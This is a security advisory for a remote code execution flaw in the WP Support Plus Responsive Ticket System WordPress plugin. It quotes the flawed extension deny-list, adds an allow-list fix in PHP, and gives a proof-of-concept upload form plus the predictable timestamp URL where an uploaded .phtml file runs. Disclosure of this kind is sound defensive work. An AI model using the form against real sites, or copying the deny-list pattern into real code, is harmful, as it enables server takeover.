WP Support Plus Responsive Ticket System < 8.0.8 - Remote Code Execution (RCE)



Description
WP Support Plus Responsive Ticket System <= 8.0.7 allows anyone to upload PHP files with extensions like ".phtml", ".php4", ".php5", and so on, all of which are run as if their extension were ".php" on most hosting platforms.

This is because "includes/admin/attachment/uploadAttachment.php" contains this code:

    switch ($extension){
        case 'exe':
        case 'php':
        case 'js':
            $isError=true;
            $errorMessege=__('Error: file format not supported!','wp-support-plus-responsive-ticket-system');
            break;
        // no default case: every other extension falls through and is accepted
    }

But it does not check for other extensions like ".phtml". In addition, it saves the file with a predictable name based on the timestamp, and anyone can load the file and run the code it contains.
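The following is an added illustration, not code from the plugin or from the advisory author: it places the deny-list pattern quoted above beside an allow-list check, so the difference on inputs like "shell.phtml" is visible. The function names, the allow-list contents and the sample file names are assumptions chosen for the example.

```php
<?php
// Added example (not plugin code). Contrast the deny-list check quoted from
// uploadAttachment.php with an allow-list check that only admits extensions a
// ticket attachment legitimately needs.

// Deny-list pattern as on the page: block a few extensions, accept everything else.
function blacklist_allows(string $filename): bool {
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    switch ($extension) {
        case 'exe':
        case 'php':
        case 'js':
            return false;
    }
    return true; // .phtml, .php4, .php5, ... all reach this line
}

// Hypothetical allow-list for a ticket system; adjust to what the site needs.
const ATTACHMENT_ALLOWLIST = ['jpg', 'jpeg', 'png', 'gif', 'pdf', 'txt', 'zip'];

// Allow-list pattern: every dotted segment after the base name must be on the
// list, so names like "invoice.phtml.jpg" are rejected too (some Apache setups
// apply handlers to any segment, not only the last one).
function allowlist_allows(string $filename): bool {
    $parts = explode('.', strtolower(basename($filename)));
    if (count($parts) < 2) {
        return false; // no extension at all
    }
    array_shift($parts); // drop the name portion, keep the extension segments
    foreach ($parts as $segment) {
        if (!in_array($segment, ATTACHMENT_ALLOWLIST, true)) {
            return false;
        }
    }
    return true;
}

// The advisory also notes the stored name was a predictable timestamp prefix;
// an unguessable name removes the second half of the problem.
function storage_name(string $filename): string {
    $extension = strtolower(pathinfo($filename, PATHINFO_EXTENSION));
    return bin2hex(random_bytes(16)) . '.' . $extension;
}

// Constructed sample names for the comparison.
$samples = ['report.pdf', 'shell.phtml', 'shell.php5', 'photo.jpg', 'x.php.jpg', 'SHELL.PHTML'];
foreach ($samples as $name) {
    printf("%-12s deny-list:%-5s allow-list:%-5s stored as %s\n",
        $name,
        blacklist_allows($name) ? 'allow' : 'deny',
        allowlist_allows($name) ? 'allow' : 'deny',
        storage_name($name));
}
```

Running the script shows the deny-list accepting every ".phtml" and ".php5" variant while the allow-list rejects them and keeps only the image, PDF, text and archive names; the stored name differs on each run because it is drawn from random_bytes rather than the clock.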

Plugin author notified 2017-11-09.

Proof of Concept
<form method="post" enctype="multipart/form-data" action="https://example.com/wp-admin/admin-ajax.php">
    <input type="hidden" name="action" value="wpsp_upload_attachment">
    Choose a file ending with .phtml:
    <input type="file" name="0">
    <input type="submit" value="Submit">
</form>


After doing this, an uploaded file can be accessed at, say:

http://example.com/wp-content/uploads/wpsp/1510248571_filename.phtml

References

URL https://plugins.trac.wordpress.org/changeset/1763596/wp-support-plus-responsive-ticket-system

Classification

Type RCE
OWASP Top 10 A1: Injection
CWE CWE-94

Miscellaneous

Submitter Robert Mathews
Submitter Website https://tigertech.net/
Submitter Twitter @TigerTech
Views 5893
Verified No
WPVDB ID 8949

Timeline

Publicly Published 2017-11-11
Added 2017-11-12
Last Updated 2020-03-08
